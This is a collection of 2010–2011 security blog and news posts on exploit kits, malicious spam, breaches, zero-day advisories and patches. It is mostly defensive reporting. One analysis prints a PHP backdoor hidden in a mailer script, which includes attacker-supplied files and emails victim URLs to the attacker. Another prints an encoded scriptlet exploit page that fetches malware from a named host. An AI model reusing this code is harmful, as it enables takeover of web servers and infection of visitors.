Computer Security Articles

If you are a regular user of Google’s search engine you might have noticed that poisoned search results have practically become a common occurrence.

Google has, of course, noticed this and does its best to mark the offending links as such, but they still have trouble when it comes to cleaning up its image search results.

ISC’s Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and shows that it is actually rather simple.

For one, they attack and compromise a great variety of legitimate websites – usually those which use WordPress, since it often has vulnerabilities that can be easily exploited and the legitimate users are often lax when it comes to updating it.

Then, they introduce PHP scripts in the sites’ source code. “These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content ? if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content,” he explains.

They also harvest other sites for images, and embed them into the site. When the scripts detect Google’s crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database.

“The exploit happens when a user clicks on the thumbnail,” says Zdrnja. “Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background.”

Google displays all of this in an iframe, and the browser automatically sends the request to the compromised page. The PHP script inserted in it checks if the user has come from a Google results page, and if he did, it displays another script – this time it’s a JavaScript one – that redirects the browser to another compromised site that serves malware.

Users should be careful on what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as the NoScript for the Firefox browser, but believes that Google could help by not using an iframe to display the results.

Yesterday, five weeks after shipping Firefox 4, the Mozilla project published the new browser’s first-ever security update. The Firefox version number bumps up to 4.0.1.

The update fixes 50-odd bugs in total, amusingly including three fixes listed as specific to OS/2. Ironically, the latest official release of the OS/2 port of Firefox, dubbed Warpzilla, hasn’t yet reached version 4 – it’s still back at version 3.6.8.

The release notes for Firefox 4.0.1 are hard to find from the main Mozilla.com page. (Browsing to Firefox.com doesn’t help, as this just redirects to the Mozilla page.) But if you know where to look, you’ll find that two critical security advisories are fixed in the 4.0.1 release.

MFSA2011-12 deals with memory corruption bugs in the browser engine itself; Mozilla experts officially opined that “with enough effort at least some of these could be exploited to run arbitrary code”. MFSA2011-17 deals with “two crashes that could potentially be exploited to run malicious code” in a graphics library called WebGLES, used by Firefox.

Because the 4.0.1 update addresses vulnerabilities that are considered remotely exploitable, we advise you to apply this update without delay.

The previous version, Firefox 3.6, also gets an update, moving to 3.6.17. This update also squashes some critical bugs, including the MFSA2011-12 memory corruption vulnerability affecting Firefox 4.

Two other critical vulnerabilities which don’t affect version 4 are fixed.

MFSA2011-13 deals with various “dangling pointer” bugs (a dangling pointer is a programming mistake in which a memory reference remains in use after the memory it points to has been returned to the operating system for re-use). MFSA2011-15 deals with a privilege escalation bug in the Java Embedding Plugin.

The MFSA2011-15 vulnerability is specific to the Mac OS X version of Firefox. Apple users who imagine themselves invulnerable simply by virtue of their choice of operating system, please take note!

There’s an update to Mozilla’s Thunderbird email client as well. Thunderbird moves to version 3.1.10.

Somewhat confusingly, the Thunderbird release notes don’t list any critical vulnerabilities fixed in this version, but the MFSA2011-12 advisory specifically states that the bugs it covers are “fixed in Thunderbird 3.0.10″.

If you’re a Thunderbird user, we advise you, too, to update as soon as you can.

On April 11, Malaysian hackers embarrassed Barracuda Networks by exploiting code vulnerability through an SQL injection and triumphantly posting names, email addresses, and passwords belonging to Barracuda’s partners, customers, and employees.

California-based Barracuda is a major player in the digital security market, boasting IBM, FedEx, and Coca-Cola among its clients. According to Barracuda’s own assessment, it was a system error that opened the doors to an automated script when a firewall was “inadvertently” left in offline mode during a maintenance window. The crawler found an SQL injection vulnerability and siphoned names and email addresses (but not financial data) of leads, partners, and employees.

Details of the attack were proudly posted at the HMSec Full Exposure Website. The loss of the data has raised concerns about Barracuda’s partners’ increased risk of spear phishing. This breach followed other attacks, such as one on RSA‘s highly regarded SecurID two-factor authentication product, a successful breach of Comodo’s SSL certificate system, and the theft of a phisher’s treasury of email data from marketing service Epsilon — all in the last five weeks.

Comodo, which claims more than 200,000 business customers, brands itself as “creating trust online.” If the RSA data theft illustrated the vulnerability of cutting-edge digital security, Comodo’s release of fraudulently obtained SSL certificates for sites like Google and Skype, no matter how quickly revoked, cut right to the heart of consumer concern about trust in Internet transactions. And it calls to mind the limitations of the government’s plan for regulating Web security.

The federal government’s National Strategy for Trusted Identities in Cyberspace (NSTIC) is at least three years away from its eventual goal of presenting the consumer with a choice of reliable credentialing products. There are no technical specifications as yet for the solutions the government expects the private sector to offer, but whatever combination of enhanced password practices, encryption, personal keys, and even biometrics rings the bell, the enabling software has to sit somewhere in cyberspace.

The casual assumption that third-party security vendors are the safe hands on the team is likely to be challenged if the current trend of high-profile thefts and attacks continues. According to security applications reviewer Veracode’s new report, “The State of Software Security Volume III,” a remarkable 72 percent of software applications developed by security services and vendors failed to achieve acceptable security quality when first tested for vulnerabilities to attacks like SQL injection and XSS — worse than the 66 percent fail record for applications from all sources.

Although re-testing showed fast and effective remediation, as Veracode’s Jonaki Egelnof said in a live Webinar presenting the findings, the data “does help explain some of the headlines we’ve been seeing recently.”

Security vendors can recover from the recent onslaught, improve their systems, and patch their tender spots. But the impression is reinforced, almost weekly, that the wish list of government and legislators for a secure environment for digital commerce remains out of touch with the realities of digital security.

- Kim Davis, Community Editor, Internet Evolution

Yesterday, Adobe issued Security Advisory APSA11-02. The advisory states that:

“A critical vulnerability exists in Flash Player 10.2.153.1 and earlier versions (Adobe Flash Player 10.2.154.25 and earlier for Chrome users) for Windows, Macintosh, Linux and Solaris, Adobe Flash Player 10.2.156.12 and earlier versions for Android, and the Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems.”

And… this new vulnerability is currently being exploited in the wild:

“There are reports that this vulnerability is being exploited in the wild in targeted attacks via a Flash (.swf) file embedded in a Microsoft Word (.doc) file delivered as an email attachment, targeting the Windows platform.”

Flash files in embedded in Office?

This attack vector prompted the following question from Brian Krebs: Does anyone know of a reliable way to disable the rendering of Flash objects in MS Office files across the board?

Our thought is why disable what you can easily uninstall?

We don’t generally use Internet Explorer, so we don’t need the IE version of Flash Player enabled at all. For Flash on the Web, you can use a designated browser (other than IE). Do you really need Flash enabled for Office?

This is what Microsoft Office will prompt when opening a document/spreadsheet/presentation containing embedded Flash content with no ActiveX version of Flash installed.

The “Non-IE” versions of Flash Player are of course still vulnerable to exploit, but it’s harder to image a successful targeted attack (via e-mail) against them, which is probably why current attacks are using Office.

Incidentally, it looks as if the next version of Flash Player (10.3) will include a control panel applet:

Looks promising:

On 12/04/11 At 03:27 PM

Websense® Security Labs™ Threatseeker® network has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually be originating from the Cutwail/Pushdo spam bot. This time round, the Cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines.  

Websense customers are protected from this attack with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

Here is an example of a malicious email in Spanish:

The malicious email is spoofed to appear to be coming from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as a formal Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection.

The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today – the Blackhole exploit kit. Any successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine.

Here is an example iframe from the Facebook attack page that points to Blackhole exploit kit:

We got hold of an exploit targeting the vulnerability Adobe reported in its most recent security advisory.

The exploit, detected as TROJ_ADOBFP.B (now detected as TROJ_ADOBFP.SM), takes advantage of the referenced vulnerability to drop another malicious file detected as TROJ_DROPPER.ADO.

TROJ_ADOBFP.B arrives in users’ systems as a malicious .SWF file that has been embedded into an .XLS file. This .SWF file contains the code for the exploit. TROJ_DROPPER.ADO, on the other hand, drops another malicious file detected as BKDR_COSMU.KO. BKDR_COSMU.KO connects to a URL to execute certain commands. It also retrieves information from the affected system such as drive information, OS, file or directory list, as well as a list of existing processes and services.

The vulnerability related to this threat affects the following software and their corresponding versions:

• Adobe Flash Player 10.2.152.33 for Windows, Macintosh, Linux, and Solaris OSs
• Adobe Flash Player 10.1.106.16 and earlier versions for Android
• Adobe Reader and Acrobat X (10.0.1) for Windows and Macintosh OSs (specifically the Authplay.dll component)

Adobe posted a schedule for the release of security updates that will address this vulnerability. All affected versions, except Adobe Reader X, will be patched on March 21. The update for Adobe Reader X will be released on June 14. Until the updates are released, users are advised to be extra careful, especially when dealing with .XLS files coming from unknown users.

Post from: TrendLabs | Malware Blog – by Trend Micro

Excel File Containing Adobe Zero-Day Exploit Found

During our investigative research into existing and emerging threats, we tend to make new discoveries.  One of the most recent cases involved the discovery of a new toolkit:

k0de Sploit Pack

The phrase at the bottom of the page (“K0de.org Open Source Exploits”) caught our attention, as we wondered how ‘open-source’ this toolkit really was. A quick Google search lead us to the third result:

Leaked Message from Exploit Kit Author

The post (or ‘paste’ if we go by Pastie.org‘s terminology) contained a leaked message written by the toolkit author in a private hacker-forum.  It reveals that this new toolkit is just a clone of the popular Eleonore with various improvements:

“As you can see it’s pretty much elenores lay out with a few touch ups & very badly made paint buttons. I’ve only been working on this for 2 hours or so, so please keep that in mind and I plan to add a lot more onto it in the coming days, so keep an eye out for news.”

The author was nice enough to provide us with interesting statistics from his own research:

“Now then, I’ve tested this on 1,000 unique hits from windows PC’s only (Xp, Vista & Win7 only) and I achieved 96 infections from it, that means the rough infection rate is at 9.6%, that is a 3.5% rise from the great Elenore mod posted by Blackdevil. Most of the infections was from MDAC & the IE kit.”

The author then calls upon fellow malware authors for their help with updating the exploits to ‘fix’ the rise in detection rate of the malicious iframe.  Also, the author lists some of the modifications he has made in this toolkit:

“Since I have tested it, the detection of the iframe has risen a lot, so in order to conduct a good test, someone will have to UD the exploits again.

I have also slightly fixed up the chrome & firefox exploits, I’m not 100% sure but they seem to be hitting at least, whereas they used to do nothing.”

In addition to the “open-source” exploit kit, the page contains a long list of anonymous proxy servers near the bottom as well as stolen credit card numbers along with the login credentials of dozens of individuals.

Here’s a screen-shot of what it looked like:

Screenshot of Stolen Credentials including CC#'s

We have confirmed that upon our notice, both Google and pastie.org have removed the illegal content, prior to publishing this blog post.

MX Lab, http://www.mxlab.eu, started to intercept an interesting exploit based on PHP. The email comes in with the subject “Mexico 2011″ and is send from the spoofed address “noreply@prodigy.net.mx” and has the following body:

Attached to the message is a small ZIP file named Mbeta.zip. Once extracted you will have a folder “mailer” two files inside: Mh.php and Tutorial.txt.

This is the content of the tutorial:

TUTORIAL: descomprime el archivo
1* Guardar el archivo Mh.php (Mailer) en su pc.
2* LO suben a su hosting por FTP
3*Una vez subido al hosting entrar desde la web ej www.sudominio.com/Mh.php
4*Este es la version beta con limitaciones, la version full se vende en el pack.
emaileficaz@yahoo.com

Translated:

TUTORIAL: unzip the file
1* Save the file Mh.php (Mailer) on your pc
2* Load up to your FTP hosting
3*Once this is done visit your web site at www.sudominio.com/Mh.php
4*This is the beta version with limitations, the full version is sold in the pack.
emaileficaz@yahoo.com

When you open the PHP on a web server you will have the following webform:

MX Lab has analyzed the PHP code that was present in the document and it appears to be some kind of PHP script to send out a mass mailing but it also contains some additional code to detect certain possibilities to find an exploit on your web server.

if (trim($ _GET['x'])!=”){@include($ _GET['x']);exit();}$ email = ‘hatuey30@hotmail.com’;$ y = ‘http://’ . $ _SERVER['HTTP_HOST'] . $ _SERVER['REQUEST_URI'];@mail($ email, ‘Exploit: ‘. $ _SERVER['PHP_SELF'], ‘Hey , this is a new victim\’s exploit: ‘. $ y .’\n\n You can use (x=shell_url) at the end of the link ‘, ‘From: ‘. $ email .’ <’. $ email .’>\r\n’);

This particular code will check your web server and sends what it has found by email to an email address, in this case hatuey30@hotmail.com.

We have replaced the address by our own address and have removed the mass mailing feature just to test. The email that we got is:

Hey , this is a new victim’s exploit: http://www.mydomain.com/Mh.php\n\n You can use (x=shell_url) at the end of the link

It is clear that with this PHP technique, your web server is at risk in a certain way. So don’t be fooled by offers that sound too good to be true and in any way do not install any scripts, wether it is PHP, ASP or Coldfusion, on your web server or shared hosting server that are sent by email.

Some exploits just do not want to go away.

Case in point is an exploit for
CVE-2004-0380
(yes, 2004!) that I have recently found in
hxxp://lixiaoxia.vhost008.cn/2.htm. The page is rather simple:

<html>
<OBJECT style="display:none;" type="text/x-scriptlet"
  data="&#77&#75&#58&#64&#77&#83&#73&#84&#83&#116&#111&#114&#101&#58&#109
    &#104&#116&#109&#108&#58&#99&#58&#92&#46&#109&#104&#116&#33&#104&#116
    &#116&#112&#58&#47/http://lixiaoxia.vhost008.cn/logo.jpg ::/102%2E%68tm">
</OBJECT>
</body>
</html>

The object tag instantiates a
scriptlet.
A scriptlet is essentially a reusable object written as a regular web
page in which scripts follow certain conventions. Think of ActiveX
controls implemented in HTML and VB script. For the sake of historical
completeness,
scriptlets were introduced in Internet Explorer 4, deprecated in
Internet Explorer 5, and disabled by default in Internet Explorer 7.
Talk about a successful technology…

After a simple decoding step, the data attribute of the scriptlet
reveals the content
MK:@MSITStore:mhtml:c:\.mht!http://http://lixiaoxia.vhost008.cn/logo.jpg
::/102.htm, which, on a vulnerable system, would cause the malware
logo.gif to be downloaded on the victim’s computer.

The malware logo.gif has surprisingly good detection on
VirusTotal
(34/41!). I wonder if it is also been around since 2004…

Most office network printers and scanners have a feature that sends scanned documents over email. Cyber crooks however, have imitated email templates used by these devices for malicious purposes. This week we noticed a malicious spam email that purports to be a scanned document sent using a Xerox WorkCentre Pro scanner.

Variations of subject lines were used like “Scan from XER0X”, “Scan from XER0X ZIP Office”, “Scan from XER0X Center Office” or “Scan from XER0X Center Office”. In the image above, the attachment is actually not a Xerox WorkCentre Pro scanned document but instead a PDF exploit file that utilizes old Adobe Acrobat Reader vulnerabilities:

1. Collab.collectEmailInfo (CVE-2007-5659) – Adobe Reader and Acrobat Multiple Stack-based Buffer Overflow Vulnerabilities
2. Utilprintf (CVE-2008-2992) – Adobe Reader ‘util.printf()’ JavaScript Function Stack Buffer Overflow Vulnerability
3. Collab.getIcon  (CVE-2009-0927) – Adobe Acrobat and Reader Collab ‘getIcon()’ JavaScript Method Remote Code Execution Vulnerability
4. mediaNewplayer (CVE-2009-4324) – Adobe Reader and Acrobat ‘newplayer()’ JavaScript Method Remote Code Execution Vulnerability

Closer look of the attached PDF exploit

The payload of the PDF exploit downloads a Trojan downloader installing additional malware such as Fake AV in the victims machine.

Cyber criminals will always strive to find ways to spread their malware. The first time we saw this Xerox spam campaign was in the middle of last year, where almost the exact same spam template was used. The only difference between the two was the malicious attachment used at that time was compressed in ZIP format. Xerox WorkCentre Pro however doesn’t send ZIP  file attachments. It’s possible that the cyber criminals realized that PDF format looks more realistic and could deceive more users especially in an office environment.

The Phoenix Exploit Kit is now available in version 2.5 in the cybercrime underground.

Exploit kits are but one of the different tools used by cybercriminals for DIY Cybercrime. The Phoenix Exploit Kit is a good example of exploit packs used to exploit vulnerable software on computers of unsuspecting Internet users. Often, cybercriminals drive traffic to the exploit kit by compromising legitimate websites and inserting IFRAMEs that point to the exploit kit or by poisoning search engine results that take users to the exploit kit.

When users land on a page injected with the exploit kit, it detects the version of the user’s Web browser and operating system and then attempts to exploit either the user’s browser or a browser plugin application. The latest version of the Phoenix Exploit Kit currently has payloads for nine different system configurations:

• XPIE7 – Internet Explorer 7 and either Windows XP, Windows XP SP2 or Windows 2003
• VISTAIE7 - Internet Explorer 7 and Windows Vista
• XPIE8 – Internet Explorer 8 and either Windows XP, Windows XP SP2 or Windows 2003
• VISTAIE8 – Internet Explorer 8 and Windows Vista
• IE – Versions of Internet Explorer that are not IE7 or IE8
• WIN7IE – Internet Explorer and Windows 7
• XPOTHER – Browsers other than Internet Explorer on Windows XP, Windows XP SP2 or Windows 2003
• VISTAOTHER – Browsers other than Internet Explorer on Windows Vista
• WIN7OTHER – Browsers other than Internet Explorer on Windows 7

Once users are directed to a payload page, the kit attempts to exploit vulnerabilities in versions of the Adobe PDF Reader, Adobe Flash, Internet Explorer and Java.

Java has become the leading exploit vector for a variety of exploit packs. In fact, the Phoenix Exploit Kit version 2.5 has been updated to include three additional Java exploits:

• JAVA RMI
• JAVA MIDI
• JAVA SKYLINE

The administration panel Phoenix Exploit Kit 2.5 contains an option to switch modes, which changes the Java exploit delivered to users. It allows the administrator to choose between TC (CVE-2010-0840), RMI or MIDI. This indicates that exploits for Java have become very attractive to malware distributors.

By targeting a wide variety of configurations, the Phoenix Exploit Kit 2.5 attempts to maximize its ability to compromise Internet users. If the first exploit fails, it targets another vulnerable application on the user’s computer. As such, users are advised to always ensure that the applications installed on their computers are kept up-to-date so they can avoid possible exploit attacks.

Post from: TrendLabs | Malware Blog – by Trend Micro

Now Exploiting: Phoenix Exploit Kit Version 2.5

Full story: TrendLabs | Malware Blog – by Trend Micro

A YouTube video is beginning to be shared widely across the internet this weekend, apparently showing a girl in a mall, who is so distracted by sending text messages on her mobile phone that she falls into a fountain.

The footage appears to be taken from CCTV security cameras and you can hear the laughter of mall employees as they watch the girl time and time again fall face first into the fountain.

(This does, of course, raise questions of privacy if the video was not staged. Should security workers really be posting CCTV footage onto YouTube for entertainment purposes? But that’s a debate which is off-topic for the purposes of this article.)

What’s most of interest to Naked Security readers is that scammers appear to be exploiting the rising popularity of the video for their own financial ends.

Experts at Sophos have discovered a rogue application on Facebook which sends links from your profile, claiming to point to the video – but which are really intended to generate income for the scammers by making you complete surveys and compromise your account to spread the links even further.

Imagine you see a message like the following posted by one of your Facebook friends. Would you click on the link?

If you were to click then you would be taken to a flashy advert for the video you are about to see:

The page reads:

GIRL FALLS IN TO FOUNTAIN BECAUSE SHES TOO BUSY TEXTING TO LOOK UP!

This is why your not supposed to text and drive or even text and WALK apparently! This chick epic failed by walking in to a water fountain because she was too busy talking on her phone to PAY ATTENTION TO WHATS IN FRONT OF HER

EPIC FAIL!

CLICK HERE TO WATCH THE WHOLE VIDEO!

If you do click to see more, then you are asked to give permission for a third-party Facebook application to access your account.

As you can see (if you bother to read the small print), the rogue application wants to access your name, gender, list of friends, profile picture and other information. It also requests the rights to post to your wall (including any Facebook pages you manage) and even email you directly.

Should this really be necessary in order to watch a video that’s freely available on YouTube?

Unfortunately some people won’t worry about their privacy at this point, and happily give the application written by complete strangers to access their accounts in order to spread the spammy message.

So what have the bad guys got to gain from this? Well, they try to trick you into completing a survey before you can watch the video.

Remember, the video is freely available on YouTube, where you don’t need to complete any surveys. And everytime you complete the survey then you earn a little commission for the scammers who are spreading the messages. We have been in contact with Facebook’s security team, and asked them to shut down the offending pages.

So don’t make it easy for the scammers, and always be very cautious about what applications you allow to access your Facebook profile.

Here’s a YouTube video where I show you how to clean-up your Facebook account if you were hit by this, or similar scams:

(Enjoy this video? You can check out more on the SophosLabs YouTube channel and subscribe if you like)

Keep your wits about you and stay informed about the latest scams spreading fast across Facebook. One of the best ways to do that is to join the Sophos Facebook page, where more than 50,000 people regularly share information on threats and discuss the latest security news.

Full story: Naked Security – Sophos

Here is a Q&A session to address some questions we have received since yesterday:

1) What versions of Microsoft Windows are affected by this flaw?

The released exploit hit only Windows Vista and Windows 7. We have found that the flaw affects Windows XP, Windows Server 2003 and Windows Server 2008 as well – both x86 and x64.

2) Can this flaw be exploited from remote?

No it can’t. It is a local privilege escalation exploit. This means that the potential malware must be already in the target machine to exploit this flaw.

3) Why is this flaw considered critical?

This flaw allows all software, even if run from a limited account, to gain system privileges. We see many of drive-by attacks, which make use of application exploits to drop malware on vulnerable machines. While there are still a huge number of customers who are used to run their operating system with administrative privileges, most users are using limited accounts or administrator accounts in Admin Approval Mode (User Account Control). Using a limited account gives them a great advantage versus malware, because it limits the vulnerable surface the malware can damage. This 0-day exploit allows a malware that has already been dropped on the system to bypass these limitations and get the full control of the system.

4) How can I defend my PC from this exploit?

Until Microsoft releases a patch, you can install Prevx Antimalware from our website. Our software has been updated to prevent this exploit from working since build release 3.0.5.220. (download here) You don’t even need to pay for a license, the protection is already active even in the free version of Prevx. Then, of course, if you like the software, we’d be pleased to defend your system security

Also, you must always keep your system up to date, by installing Windows updates. Moreover you need to keep every software you’ve installed in your PC up to date, to limit as much as possible all potential attack vectors. Do not surf unsafe websites like porn websites or crack/warez websites, they are often vehicle of malware. Be careful when you download anything from peer to peer applications like eMule.

5) Will Microsoft release a patch to address this flaw?

Microsoft is actively working to analyze the flaw and fix this issue as soon as possible.

6) Where I can find a description of the exploit?

We haven’t released any in-depth technical detail about the exploit, even though the whole exploit code is already public on the web. The flaw is a stack overflow in Win32k driver which can be exploited to gain code execution in kernel mode. More details at this link]]>

View the original article at Prevx Blog

Over the last few years, we’ve witnessed dozens of Exploit Kits such as the Phoenix Exploit Kit, Eleonore Exploit Kit, Yes Exploit Kit and even some old Exploit Kits such as IcePack and MPack.  We’ve observed that most of Exploit Kits don’t last more than one year, except for one…

NeoSploit Administration Login Panel.

Background: The Old NeoSploit

Neosploit Exploit Kit was first seen by M86 Labs in 2007.  It was one of the first exploit kits that was developed in order to exploit browser vulnerabilities such as MDAC RDS and ActiveX vulnerabilities.  The NeoSploit Exploit kit then evolved to spread the attack vector via the Adobe Reader Collab CollectEmailInfo vulnerability.

In April 2008, the NeoSploit team released Version 3 which included improved statistics and configuration control as well as a stabilized and sophisticated exploit package.  However, in July the team announced it would stop supporting and updating the Neosploit project due to financial problems.  This lead to a rapid decline in Neosploit’s prominence in the wild until it disappeared. Rumors began to spring up that the source code of Neosploit had been leaked.

The Return of Neosploit

At the end of 2009, we noticed a new trend of obfuscation techniques that were pretty similar to what we have seen before from the notorious NeoSploit Exploit Kit. Since seeing the first occurrence of this new version of NeoSploit, the concept has stayed the same.

Snippet Obfuscated Code from November 2009.

Snippet Obfuscation Technique from a New Version.

The obfuscated scripts above, both versions generate a decryption algorithm function and a unique key that is sent back to the server, which includes the software applications installed on the victims’ machine such as browsers and Adobe versions.

The URL that was Generated Including the Secret Key and Details on the Victim Browser.

In the second phase of the exploitation, the client retrieves the encrypted exploit page with the relevant exploits targeting the vulnerable applications on the victims’ machine. Although we have already seen this encryption technique used by Luckysploit Toolkit more than a year ago, this dynamic obfuscation still makes it much harder for security vendors to block this type of attack.

Low Detection by the Anti-Virus Companies 3/42

Shedding Light on the Architecture of Neosploit

Not only has the Neosploit team upgraded their obfuscation techniques, they’ve also put a lot of thought into the architecture of the toolkits backend.  Unlike other exploit kits, where the authors sell the toolkit itself (in some cases the source code is encrypted and could work only under a certain domain) , the users of the Neosploit Exploit Kit don’t need to have the source code or even the compiled version of the tool.  The Neosploit backend is activated only by the team itself and the users just receive access to use it, effectively establishing a business model of Malware-as-a-Service.

The URL pattern of the infection page is exactly the same on each attack:

XXXX – in the sample above, the request is caught by the apache/nginx configuration and sent to the backend server, as described in the sample below.

The above code was taken from a Neosploit nginx configuration file.  It redirects every request that includes a certain pattern to the backend server and adds a certain key to the header request.

The architecture that is being used by Neosploit team is very effective by several layers:

• It simplifies the installation of the toolkit on the server, while the users don’t need to install the toolkit itself, just redirecting the request to the backend server
• It is much harder to expose the team behind the toolkit
• It simplifies the toolkit update procedure

Neosploit 4 Control Panel

Just as we mentioned above, the attacker does not need to have any interaction directly with the backend server; the attacker could monitor and manage the progress of his attack via a proxy that connects to the backend server.

The control panel of the Neosploit has not changed much:

Administration Panel of Neosploit 4 – Daily Stats

Pay attention to the amount of incoming traffic redirected to the toolkit, in addition the high infection rate of the toolkit – above 20 percent.

The control panel of the toolkit includes the version of the toolkit: Version 4.2 (build 4281).  As described above, the Neosploit team is capable of updating the toolkit, thus simplifying the process for their customers.

Neosploit 4 Configuration Rules of the Payload

The customer doesn’t host the payload on their own server; they upload it via the Neosploit control panel, which allows them to define a payload for each operation system, country and browser:

Neosploit 4, Country Statistics of a Certain Attack Day

Neosploit 4, Browser Statistics.

The fact is that almost four years after the first version of the Neosploit project was published, the project continues to thrive and remain active.  This showcases the fact that a good product can survive over time, so long as it is being maintained and adjusted to keep up with security trends to allow it to stay ahead of the curve.

Full story: M86 Security Labs Blog

Microsoft has just published an advisory about a remotely-exploitable vulnerability in the Windows graphics rendering engine. A patch isn’t available yet, but with Patch Tuesday just a week away, we can hope that it will be knocked on the head then.

The bug was presented as a sort-of “hacker case study” at a recent hacking convention in Korea, and a working exploit was recently added to the freely-available Metaspolit Framework by a developer named jduck.

Fortunately, the Metasploit exploit code is rather limited, officially targeting only Windows 2000 and Windows XP SP3, but it does serve as a documented proof-of-concept for anyone who cares to study it.

According to jduck (no relation to me – his real name is Joshua Drake, geddit?), the vulnerability exists in code which processes a DIB (device-independent bitmap), allowing a “stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents.”

This isn’t the first time that Microsoft has been hit by security problems processing graphical objects.

A calculation flaw in handling JPEG files led to a remotely exploitable hole in September 2004, a long-forgotten feature-turned-bug in WMF (Windows Metafile) handling forced an out-of-band security fix in January 2006, and in August 2010, bitmap-handling code was the culprit in a kernel vulnerability which allowed unprivileged users to crash Windows computers at will.

Sadly, our increasing insistence that everything we see on the internet to be served up in a sea of graphical gewgaws comes with considerable risk: greatly increased code complexity, the unrelenting enemy of computer security.

Full story: Naked Security – Sophos

And some Web sites will be a lot safer! While reviewing
incidents and deobfuscating a Web site today, I discovered an
installation of a particular exploit kit that won't work after New
Year's Eve.  The site I found caught my attention because the code
simply looks like garbage.  As the saying goes, "One man's trash is
another man's treasure."  So I started digging into the obfuscation of
the code and found something that I thought would be topical considering
today's date.  The code in this exploit kit will actually expire at
midnight on New Year's Eve local time!  In this post, I'll cover how I
came across this and show you how and why the exploit kit installations
will expire.

Here is a screen shot of the code in the original state as I found it:

…(read more)

Full story: Security Labs

A stack-based buffer overflow vulnerability in Microsoft Office was recently discovered to have been actively exploited in the wild. Trend Micro now detects the exploit .RTF files as TROJ_ARTIEF.SM.

The malicious .RTF files have shell codes designed to overflow the stack and to cause Microsoft Word to crash. As a result, malicious users can execute arbitrary commands on an affected system.

From the screenshot above, we can see that the malware employed a (NOP) sled to overflow the buffer and to execute codes in the context of Microsoft Word. The malware we encountered dropped another malicious file detected as TROJ_INJECT.ART.

One of the more serious concerns is that a malicious user could send an RTF email to target users. Since Microsoft Outlook uses Word to handle email messages, the mere act of opening or viewing specially crafted messages in the reading pane may cause the exploit code to execute.

Microsoft already released an update to address the said vulnerability. Users are strongly advised to download and install the patch, which can be found in the official bulletin MS10-087. This was issued as part of November’s Patch Tuesday.

Post from: TrendLabs | Malware Blog – by Trend Micro

Malicious .RTF Files Exploit Microsoft Office Vulnerability

– Karl Dominguez (Threat Response Engineer) on TrendLabs | Malware Blog – by Trend Micro

Microsoft has issued an advisory for an unpatched vulnerability affecting all versions of Internet Explorer on all platforms. The vulnerability could allow a malicious web page to trigger a denial of service or remote code execution in the context of the IE user. Exploit code for the vulnerability has been published but there not yet any reports of active exploits in the wild.

The vulnerability is of a type known as “use-after-free” and is in the CSharedStyleSheet::Notify function in the CSS parser in mshtml.dll. Multiple @import calls in the attack document trigger the vulnerability. It was first reported by wooyun.org.

The exploit bypasses ASLR (Address Space Layout Randomization) and DEP (Data Execution Prevention) by taking advantage of a library it loads (mscorie.dll) which was not compiled with the /DYNAMICBASE option which enables ASLR and therefore loads predictably at the same address. Microsoft doesn’t say why this, and apparently other libraries weren’t compiled with this option, but suggests that you use their Enhanced Mitigation Experience Toolkit to force all loaded DLLs to dynamically rebase. This change should make the exploits highly unlikely to succeed. This video demonstrates the process.

Microsoft also stresses that protected mode in Internet Explorer 7 and 8 on Windows Vista, Windows 7 and Windows Server 2008 mitigate the vulnerability by limiting the privileges of attack code which succeeds in exploiting the vulnerability.

– on Security Watch

Kaspersky Lab’s senior anti-malware researcher Kurt Baumgartner discusses the use of ROP (return-oriented programming) techniques in vulnerability exploit packs. – on Securelist / All Updates

There has been a proof-of-concept (POC) in the wild that includes source code containing information on how to exploit a flaw in Windows kernel API RtlQueryRegistryValues, which can lead to privilege elevation.

              …



  – Zarestel Ferrer on CA Security Advisor Research Blog

Malware authors use existing software vulnerabilities in order to place their piece of malicious code into the victim’s system – WebMaster (news@malwarecity.com) on MalwareCity Blog

This isn’t exactly what could be defined a lucky year for Microsoft. If Windows 7 sales are booming, on the other hand the operating system made-in-Redmond has been hit hard by a lot of targetted attacks during these months. Aurora exploit is just the first of the year, but the most serious attack has definitely been the Stuxnet case. Finding a 0day exploit is always difficult, but using four 0day exploits all together is actually impressive.

Yesterday another serious 0-day flaw has been publically disclosed on a chinese board.

This is a serious flaw because it resides in win32k.sys, the kernel mode part of the Windows subsystem. It is a privilege escalation exploit which allows even limited user accounts to execute arbitrary code in kernel mode.

Win32k.sys’s NtGdiEnableEUDC API is not rightly validating some inputs, causing a stack overflow and overwriting the return address stored on the stack. A malicious attacker is able to redirect the overwritten return address to his malicious code and execute it with kernel mode privileges.

Being a privilege escalation exploit, it bypasses by design even the protection given by the User Account Control technology implemented in Windows Vista and Windows 7. All Windows XP/Vista/7 both 32 and 64 bit are vulnerable to this attack.

Good news is that we have not yet detected any malware exploiting this flaw. Bad news is that the flaw has been published online. This could potentially become a nightmare due to the nature of the flaw. We expect to see this exploit being actively used by malwares very soon – it’s an opportunity that malware writers surely won’t miss.

We won’t disclose any further detail about the vulnerability at the moment because we are collaborating with Microsoft on this flaw.

– Marco Giuliani on Prevx Blog